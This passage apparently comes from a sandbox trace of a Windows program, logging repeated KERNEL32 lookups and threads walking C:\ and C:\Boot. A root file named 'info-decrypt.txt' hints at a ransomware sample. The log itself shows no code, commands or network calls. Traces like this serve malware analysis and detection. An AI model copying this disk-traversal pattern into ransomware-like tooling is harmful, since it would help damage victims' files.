(hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0113.164] SysReAllocStringLen (in: pbstr=0x669f8dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x669f8dc*="KERNEL32.DLL") returned 1 [0113.164] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0113.165] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.167] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0113.167] SysReAllocStringLen (in: pbstr=0x669f8b8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x669f8b8*="KERNEL32.DLL") returned 1 [0113.167] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0113.167] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.170] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.172] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0113.173] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0113.184] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0113.185] ResetEvent (hEvent=0x2e8) returned 1 Thread: id = 64 os_tid = 0xae8 [0118.064] SysReAllocStringLen (in: pbstr=0x67af57c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x67af57c*="KERNEL32.DLL") returned 1 [0118.064] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0118.065] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.068] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0118.069] SysReAllocStringLen (in: pbstr=0x67af57c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x67af57c*="KERNEL32.DLL") returned 1 [0118.069] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0118.069] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.072] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0118.073] SysReAllocStringLen (in: pbstr=0x67af558*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x67af558*="KERNEL32.DLL") returned 1 [0118.073] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0118.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.076] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.080] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0118.085] SysReAllocStringLen (in: pbstr=0x67af830*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x67af830*="KERNEL32.DLL") returned 1 [0118.085] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0118.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.088] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 67 os_tid = 0xbd4 [0119.163] SysReAllocStringLen (in: pbstr=0x6a8f7ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a8f7ac*="KERNEL32.DLL") returned 1 [0119.163] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0119.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0119.166] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0119.167] SysReAllocStringLen (in: pbstr=0x6a8f7ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a8f7ac*="KERNEL32.DLL") returned 1 [0119.167] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0119.167] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0119.170] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0119.170] SysReAllocStringLen (in: pbstr=0x6a8f788*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a8f788*="KERNEL32.DLL") returned 1 [0119.170] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0119.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0119.174] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0119.176] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0119.185] SysReAllocStringLen (in: pbstr=0x6a8fa60*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a8fa60*="KERNEL32.DLL") returned 1 [0119.186] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0119.186] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0119.188] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 110 os_tid = 0xa74 [0130.658] SysReAllocStringLen (in: pbstr=0x657facc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657facc*="KERNEL32.DLL") returned 1 [0130.658] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0130.658] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.661] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.662] SysReAllocStringLen (in: pbstr=0x657facc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657facc*="KERNEL32.DLL") returned 1 [0130.662] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0130.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.665] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.665] SysReAllocStringLen (in: pbstr=0x657faa8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657faa8*="KERNEL32.DLL") returned 1 [0130.665] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0130.666] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.669] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.671] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.673] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0130.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x657f810) returned 1 [0130.678] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x657f318, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0130.678] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x657f2ec, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0130.678] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x657f538 | out: lpFindFileData=0x657f538*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xb7ef50 [0130.679] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0130.679] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0130.679] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0130.679] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0130.679] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0130.679] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0130.680] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccb1620, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccb1620, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0130.680] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0130.680] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0130.680] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0130.680] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0130.681] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0130.681] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0130.681] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0130.681] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0130.681] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0130.682] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcdbbfc0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0130.682] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x657f548 | out: lpFindFileData=0x657f548*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcdbbfc0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0130.682] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0130.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x657f7d0) returned 1 [0130.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x657f7dc) returned 1 [0131.294] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0131.294] CoUninitialize () [0131.296] SysReAllocStringLen (in: pbstr=0x657fd80*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657fd80*="KERNEL32.DLL") returned 1 [0131.296] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.298] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 111 os_tid = 0xba8 [0130.726] SysReAllocStringLen (in: pbstr=0x6a7f654*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a7f654*="KERNEL32.DLL") returned 1 [0130.726] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0130.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.729] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.730] SysReAllocStringLen (in: pbstr=0x6a7f654*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a7f654*="KERNEL32.DLL") returned 1 [0130.730] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0130.730] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.733] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.733] SysReAllocStringLen (in: pbstr=0x6a7f630*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a7f630*="KERNEL32.DLL") returned 1 [0130.733] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0130.734] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.737] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.740] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.741] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0130.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2fc) returned 1 [0130.753] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x6a7ee04, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0130.753] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x6a7edd8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0130.753] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x6a7f024 | out: lpFindFileData=0x6a7f024*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0130.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0130.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0130.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0130.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0130.755] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0130.755] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0130.755] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0130.755] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0130.755] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0130.756] FindNextFileW (in: hFindFile=0xb7ef50, 